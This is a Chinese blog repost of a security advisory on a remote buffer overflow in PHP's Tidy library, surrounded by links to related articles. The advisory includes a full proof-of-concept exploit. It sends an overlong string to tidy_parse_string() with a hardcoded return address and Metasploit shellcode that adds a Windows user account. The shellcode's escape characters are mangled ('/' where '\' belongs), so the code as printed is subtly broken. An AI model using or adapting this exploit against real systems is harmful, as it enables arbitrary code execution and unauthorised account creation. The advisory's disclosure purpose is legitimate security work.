PHP Tidy库远程缓冲区溢出漏洞

最新推荐文章于 2024-04-27 00:33:57 发布
最新推荐文章于 2024-04-27 00:33:57 发布
阅读量650 收藏
点赞数
文章标签: php extension string 文档 xhtml thread
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linkboy2004/article/details/1661974
版权
受影响系统:
C. Reitzel TidyLib for PHP 050506
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24527

Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档。

Tidy库实现上存在缓冲区溢出漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文档执行恶意指令。

PHP所使用的Tidy库中没有正确验证对tidy_parse_string()和tidy_repair_string()函数的输入。如果用户向这些函数传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意指令。

<*来源:rgod (rgod@autistici.org)
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"/xfc/xbb/x0b/xad/x7d/x9a/xeb/x0c/x5e/x56/x31/x1e/xad/x01/xc3/x85".
"/xc0/x75/xf7/xc3/xe8/xef/xff/xff/xff/xf7/x45/x39/x9a/x07/x96/x49".
"/xdf/x3b/x1d/x31/xe5/x3b/x20/x25/x6e/xf4/x3a/x32/x2e/x2a/x3a/xaf".
"/x98/xa1/x08/xa4/x1a/x5b/x41/x7a/x85/x0f/x26/xba/xc2/x48/xe6/xf1".
"/x26/x57/x2a/xee/xcd/x6c/xfe/xd5/x29/xe7/x1b/x9e/x6d/x23/xe5/x4a".
"/xf7/xa0/xe9/xc7/x73/xe9/xed/xd6/x68/x9e/x12/x52/x6f/x4b/xa3/x38".
"/x54/x8f/x77/xf1/x54/xeb/xfc/xb2/x64/x76/xc2/x4b/x89/xf3/x83/xa7".
"/x1a/x73/x18/x15/x97/x1b/x28/x8e/xa1/x50/xa8/xe0/xb2/x66/xa9/x8b".
"/xdb/x5a/xf6/xba/xed/xc2/x5e/x34/xe9/x81/x9f/x3d/x5a/xed/xf0/x0c".
"/xba/x8d/x66/x09/xc5/xc7/x79/x7e/xc5/x30/xe6/xed/x5d/x90/x8c/x95".
"/xf8/xcc/x61/x05/x23/x62/x1b/xbd/x03/x0f/x90/x58/x36/xcf/x25/xd6".
"/xd8/x2f/xbe/x62/x50/x0f/x11/xd2/xde/x0b/x4d/xf2/xf8/xb3/xe3/x9f".
"/x70/x93/x97/x30/x1a/xb2/x0b/xa8/xae/x5b/xa1/x46/x6f/xe2/x2d/xca".
"/x06/x8a/xc4/x67/xad/x20/x76/xfc/x22/xb6/x0b/xdc/xcf/x43/x82/x3c".
"/x1f/xea/x1e/x79/x5f/xec/x9e/x81/x5f";

$EIP="/x8B/x51/x81/x7C"; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("/x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

C. Reitzel
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://dev.int64.org/tidy.html
 
linkboy2004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
12-19
漏洞说明 ...扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析。 软件下载: ...
php 缓冲区溢出漏洞,PHP Tidy远程缓冲区溢出漏洞
weixin_28787801的博客
03-25 465
受影响系统:C. Reitzel TidyLib for PHP 050506描述:--------------------------------------------------------------------------------BUGTRAQ ID: 24527Tidy用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档Tidy实现上存...
【新大陆】98个漏洞索引汇总^_^可以玩很久了^_^
ronnie88597的博客
07-16 420
作者:WHEREISK0SHL 原文:https://whereisk0shl.top/post/2019-03-09 98篇文章几乎全部都是来自exploit-db,exploit-db提供了exploit/PoC,以及漏洞软件下载的地址,paper以及一些漏洞细节的说明 漏洞总结索引 越界读写 TCPDUMP 4.5.2拒绝服务漏洞 NetCat【nc】 0.7.1 远程拒绝服务漏洞 VideoLAN VLC Media Player 2.2.1 栈溢出 HALLIBURTON LOGVIEW PRO拒
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 13万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
影响超过四百万网络摄像头:Zoom客户端存在0 day漏洞可能导致代码执行
systemino的博客
07-12 1521
CVE编号 CVE-2019-13449:Zoom客户端拒绝服务漏洞(已在4.4.2版本客户端中修复) CVE-2019-13450:网络摄像头信息泄露漏洞(目前暂未发布补丁,计划在7月10日发布) 前言 近期,我们发现Zoom客户端存在两个安全漏洞。其中的一个漏洞允许任何网站在未经用户允许的情况下,强行将用户加入到Zoom呼叫中,并激活其摄像头。另外一个漏洞可以通过多次将用户加入到无效的...
docx-tidy:PHP可整理DOCX XML文件
05-16
一个用于整理DOCX XML文件PHP:合并具有相同类型和属性的连续元素。 通过简化DOCX XML的标记,DocxTidy减轻了自定义修改(例如基于DOCX的模板化)所需的工作。 合并具有相同运行属性的连续运行 在每次运行中合并...
PHP+Tidy-完美的XHTML纠错+过滤
10-30
PHP+Tidy-完美的XHTML纠错+过滤
CSSTidy_php_
09-30
CSSTidy 是一个开源的样式表CSS优化工具,使用csstidy 可以轻易的将你的CSS 样式压缩,压缩率能达到1/4以上,还可以自动将CSS代码中的注释、多余的属性去掉,并将相似的样式合并以达到优化压缩CSS样式最大。
spdlog 日志部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 483
针对 网络上spdlog日志目前存在的使用方式固定,不能发挥这个本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
Android配置环境
u012627628的博客
04-24 306
执行命令:sudo mv /home/用户名/Downloads/android-sdk-linux /usr/java。sudo mv /home/用户名/Downloads/jdk1.8.0_271 /usr/java。执行命令:/usr/java/android-sdk-linux/tools/android。执行命令:tar -zxvf android-sdk-linux.tgz。执行 source /etc/profile。验证是否安装成功(我验证是成功的)执行:java -version
bugku ezbypass
m_de_g的博客
04-23 214
bugku ezbypass $++,$_++
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 564
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
php时间人性化展示
赛时科技
04-22 160
函数,用于将时间戳转换为人性化的时间差。该函数遍历了不同的时间单位,找到合适的单位来表示时间差,并返回相应的字符串。这样,你就可以根据需要将时间以人性化的方式展示给用户了。你可以根据具体需求调整时间格式和单位。函数将其格式化为"年-月-日 时:分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的时间戳,并使用。函数来实现时间的人性化展示。函数将"-2 days"转换为时间戳),然后调用。最后,我们假设有一个过去的时间戳(这里使用。函数将其转换为人性化的时间差,并输出结果。
牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
最新发布
weixin_37991016的博客
04-27 170
【代码】牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
FRPC+PHP+MYSQL+APACHE2=个人网站
这里没有简介
04-24 403
然后,任意访问 www.domain.com或者222.domain.com,会发现得到的页面都是一样的。可以看到,有很多目录,我想实现 typecho.domain.com,这样的三级域名的方式,访问,应用背景有公网需求,但是又不想去买又贵又低配置的服务器,然后方案就应运而生。PHP+MYSQL+APACHE2,作为网站搭建,具体细节不细讲,custom_domains 其中的值,带上了*,通配符匹配。token = 第三方token。这个时候,需要配置apache。在FRPC.ini的配置里面。
WordPress自动采集发布AutoPostPro汉化版插件
pengqingwen的博客
04-23 247
WP-AutoPostPro 是一款极为出色的WordPress自动采集发布插件,其显著优势在于能够从任何网站抓取内容并自动将其发布到你的WordPress网站上。它实现了对任何网页内容的自动采集和发布,整个采集过程完全自动化,无需手动操作。此外,它还提供了一系列实用功能,如内容筛选、HTML标签过滤、关键词替换、自动添加链接、自动生成标签、自动将远程图片保存到本地服务器、自动为文章添加前缀和后缀,以及使用微软翻译引擎将采集到的文章自动翻译成多种语言进行发布。
php中常见的文件操作方法
赛时科技
04-22 46
请注意,进行文件操作时,确保对文件路径和权限进行正确的处理,以避免出现错误或安全问题。同时,对上传的文件进行适当的验证和过滤,以防止潜在的安全风险。修改文件通常涉及到读取文件内容,进行修改,然后重新写入文件。你可以结合上述的读取和写入操作来实现文件内容的修改。PHP文件常见的操作包括读取、写入、修改、删除以及处理文件上传等操作。这只是一个基本的文件上传处理示例,实际应用中还需要考虑更多的安全性和错误处理机制。超全局数组来获取上传的文件信息。当处理文件上传时,通常使用。
模型部署的艺术:让深度学习模型跃入生产现实
凡江林的博客
04-23 860
将一个深度学习模型从实验室带到最终用户手中的过程,可以看作是一次长途旅行。旅途开始于模型的训练,这是为旅行准备必需的知识和能力。随后,模型需要经过多轮的打包与优化,就像打包行李一样,既不能带得太多以至于负担沉重,也不能遗漏关键物品。接着,选择合适的部署环境,就如同选择旅行的目的地,可能是云环境,也可能是边缘设备。在这个过程中,模型会经历各种测试和优化,以确保它能够高效运行,并能够适应环境的变化。
vscode tidy
08-22
对于VSCode中的代码整理(tidy),您可以使用以下两种方式: 1. 使用内置的代码整理功能:VSCode提供了内置的代码格式化功能,可以根据您选择的编程语言自动整理代码。您可以通过按下快捷键"Shift + Alt + F"来触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值